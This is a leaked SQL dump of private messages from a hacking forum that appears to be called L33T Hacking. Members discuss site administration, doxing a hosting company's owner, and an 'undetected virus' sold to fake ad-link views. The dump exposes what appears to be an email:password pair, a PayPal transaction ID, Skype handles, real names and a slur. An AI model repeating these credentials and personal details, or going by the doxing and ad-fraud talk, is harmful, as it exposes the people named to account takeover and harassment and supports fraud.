', '1350527219', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3769', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\'] [quote=\'Exposé\'] [quote=\'Timmy\'] http://pastebin.com/eXVxALWX [/quote] Lmao...who is this...and yeh if you got this ur good :D [/quote] xhostfire.com hosting owner. I didn\'t DOX him, Jok3r did because jok3r was banned from one of their servers for running a site with phishing discussions. [/quote] Well a hosting company isnt that hard to dox since they use real information....lmao. But do you dox at all?', '1351044545', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3357', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\'] I know you know a lot about bh but can\'t you contribute in BH orums? [/quote] What are you trying to say?', '1350532230', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3426', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype', '0', '[quote=\'t3h jok3r\'] Can you come on Skype? [/quote] Tomorrow I need to finish hw then studying. What is up?', '1350617431', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3428', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\'] [quote=\'?(???)?TREYZ?(???)?\'] [quote=\'t3h jok3r\'] Look I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. [/quote] sorry im just so excited :) [/quote] I can understand but it\'s annoying. [/quote] sorry admin', '1350617483', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3430', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] [quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :) Im Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852 I have had experience being moderator before at a hacking forum called Eliteguys Here is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L As you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there here is my profile on L33T HACKING : http://l33thacking.net/user-258.html Looking forward to hearing from you [/quote] http://l33thacking.net/misc.php?action=help&hid=17 [/quote] Ok i understand , How about a free upgrade then? You said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum I am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here.. The reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t Ubers is all about money now , i id rather be a part of this community instead of ubers How about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :) [/quote] Sure that would be great but before we upgrade someone we now require two HQ threads. [/quote] Already Done!! , i posted 4 HQ tuts 2 extra :) : http://l33thacking.net/thread-987.html http://l33thacking.net/thread-988.html http://l33thacking.net/thread-989.html http://l33thacking.net/thread-990.html', '1350639163', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3432', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Unique group', '0', 'just curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :)', '1350650464', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3946', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey', '0', 'Hey man whats happening ', '1351735873', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3937', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Adfoc.us Views', '0', '[quote=\'sirchamp\'] [quote=\'iTzIpod\'] Are you willing to give me any more? Also, if you can, I would appreciate you giving out the source. Like the bot/program or the website. Whatever you use to get the Adfoc.us views! :o I really need this.. I\'ll like share half my profits with you. [/quote] I have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective. [/quote] Oo. Will you give it to me? :p Umm Can you get me more views? Same information iTzIpod@hotmail.com:Moneymaking :D Thanks. Paying you more money.', '1351726933', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3939', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for Advert', '0', '[quote=\'t3h jok3r\'] I need your help in GFX, I have seen couple of your threads on GFX so thought you could help me out. Doesn\'t matter if it\'s professional or not but must look decent. I need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive. The size should be 700x90 or anything smaller. Thanks a bunch. [/quote] Any ideas on the slogan?', '1351726957', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3941', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YouTube', '0', '[quote=\'t3h jok3r\'] The following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral. [/quote] Fixed link I think. Not sure.', '1351726975', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3943', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'??zg???g????61\'] [quote=\'t3h jok3r\'] Sup long time no chat. [/quote] Yeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything? [/quote] Np, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side? [/quote] Yeah but we\'re all good', '1351732353', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3910', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: LH site overview', '0', '[quote=\'t3h jok3r\'] I recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done. Should I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion? Sent to NXK and VirtualLegend. [/quote] I think its a good idea to make it public from now. And we need to let people see how we are different than HF! I think after 5/6 Months that LH has alot of members :D', '1351632903', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3912', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Skype', '0', 'Do you have skype? and do i have you already as a contact ? Skype: VirtualLegend', '1351634331', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3914', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Sup long time no chat. [/quote] Yeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?', '1351635685', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3916', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Adfoc.us Views', '0', 'Are you willing to give me any more? Also, if you can, I would appreciate you giving out the source. Like the bot/program or the website. Whatever you use to get the Adfoc.us views! :o I really need this.. I\'ll like share half my profits with you.', '1351636127', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3918', '228', '160', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Signature', '0', 'Hello Jacob, I Have Finally Made your Signature, I Hope you like it. Signature: [url=http://i.imgur.com/GgQJx.jpg]http://i.imgur.com/GgQJx.jpg[/url]', '1351638542', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3920', '228', '160', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Signature', '0', 'Hello Jacob, I Have Finally Made your Signature, I Hope you like it. Signature: [url=http://i.imgur.com/GgQJx.jpg]http://i.imgur.com/GgQJx.jpg[/url]', '1351638544', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3926', '302', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Question', '0', 'In the givaways section may i post a free hosting thread? Also can i have a link to the rules?', '1351697238', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3928', '228', '302', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '2', 'Awnser', '0', 'Hi, What you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days. Help Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url]', '1351697448', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3930', '302', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Awnser', '0', '[quote=\'VirtualLegend\'] Hi, What you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days. Help Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url] [/quote] Thanks !!!', '1351698043', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3932', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Adfoc.us Views', '0', '[quote=\'iTzIpod\'] Are you willing to give me any more? Also, if you can, I would appreciate you giving out the source. Like the bot/program or the website. Whatever you use to get the Adfoc.us views! :o I really need this.. I\'ll like share half my profits with you. [/quote] I have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective. ', '1351701312', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3934', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\'] I know you have a busy schedule but I really need help. I need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive. The size should be 700x90 or anything smaller. Thanks a bunch. [/quote] can this wait 1-2 days? I\'m really busy latetly :/', '1351708362', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3886', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Views', '0', '[quote=\'t3h jok3r\'] Hi, Did you bot views on your adfocus thread? I would like you to be honest. [/quote] No. Im also surprised. ', '1351537450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3891', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'How i found HF', '0', 'Someone posted it on forumcore.net I\'m a contributer there name is TreeJay.', '1351540502', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3895', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Question about Elite', '0', 'hey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :(', '1351596607', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3900', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Question about Elite', '0', '[quote=\'t3h jok3r\'] [quote=\'Mac Miller\'] hey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :( [/quote] Yes that\'s correct. The upgrade price is $5 but since you are from forumcore I can make it $2 for you. Just go on the upgrade page, replace the 5 with 2 and click buy now. [/quote] 48Y76765KV292333W. that transaction id and thanks man :)', '1351621224', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3907', '61', '228', '61', 'a:1:{s:2:\"to\";a:2:{i:0;s:1:\"1\";i:1;s:3:\"228\";}}', '2', 'Re: LH site overview', '0', '[quote=\'t3h jok3r\'] I recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done. Should I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion? Sent to NXK and VirtualLegend. [/quote] Sure, Hopefully it would bring in new members.', '1351624567', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3447', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi`', '0', '[quote=\'t3h jok3r\'] Hi, I was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site. [/quote] OK SURE SORRY', '1350681023', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3450', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi`', '0', '[quote=\'t3h jok3r\'] [quote=\':)TROLLED:)\'] [quote=\'t3h jok3r\'] Hi, I was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site. [/quote] OK SURE SORRY [/quote] It\'s OK and thanks for replying back. [/quote] CHANGED', '1350681181', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3452', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Unique group', '0', '[quote=\'R?????zo?\'] just curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :) [/quote] I would love too bro Thanks for the invite', '1350683860', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3454', '61', '3', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'me', '0', 'hey it\'s logan [8:11:11 PM] ??????????¢™: Logan thats you? [8:11:16 PM] Logan Turner: oui [8:11:20 PM] ??????????¢™: ? [8:11:23 PM] Logan Turner: yes [8:11:33 PM] ??????????¢™: lie [8:11:55 PM] ??????????¢™: Go to my profile then NXK BreShiE Kasual Lewis Carhart', '1350691900', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3456', '270', '3', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'faggy', '0', 'faggot I was joking.', '1350693196', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3458', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Yo', '0', '[quote=\'ƒ???????????g\'] [quote=\'VirtualLegend\'] It is now gone [/quote] ok thanks broski :D [/quote] [img]http://i.imgur.com/wiMSA.jpg[/img] What do you think?', '1350696855', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3460', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Skype', '0', 'Can you come online on skype? ', '1350697502', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3462', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?', '1350697612', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3465', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Yo', '0', '[quote=\'VirtualLegend\'] [quote=\'ƒ???????????g\'] [quote=\'VirtualLegend\'] It is now gone [/quote] ok thanks broski :D [/quote] [img]http://i.imgur.com/wiMSA.jpg[/img] What do you think? [/quote] Not bad but I would change the font up a little. Kinda hard to see...', '1350699254', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3468', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\'] [quote=\'??????????¢™\'] [quote=\'Timmy\'] I know you know a lot about bh but can\'t you contribute in BH orums? [/quote] What are you trying to say? [/quote] You are not active in hacing sections. [/quote] I am not really into hacking anymore.', '1350701817', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3471', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\'] [quote=\'??????????¢™\'] [quote=\'Timmy\'] [quote=\'??????????¢™\'] [quote=\'Timmy\'] I know you know a lot about bh but can\'t you contribute in BH orums? [/quote] What are you trying to say? [/quote] You are not active in hacing sections. [/quote] I am not really into hacking anymore. [/quote] Why your activity will help lh a lot [/quote] I know it will but im not really into that anymore. I will think about getting back into it.', '1350703851', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3473', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online.', '1350703985', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3476', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....', '1350705487', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3479', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm? [/quote] Yes, PM me back so I know you are online now. [/quote] Online. [/quote] I checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive. I\'m sorry but I have to demote you, but would you like to become a Mod or Elite? [/quote] Are you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me.... [/quote] I understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH. [/quote] And I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats: http://i.imgur.com/CifkV.png 3 posts in the last while.. I have not been active on hf...', '1350705843', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3482', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] 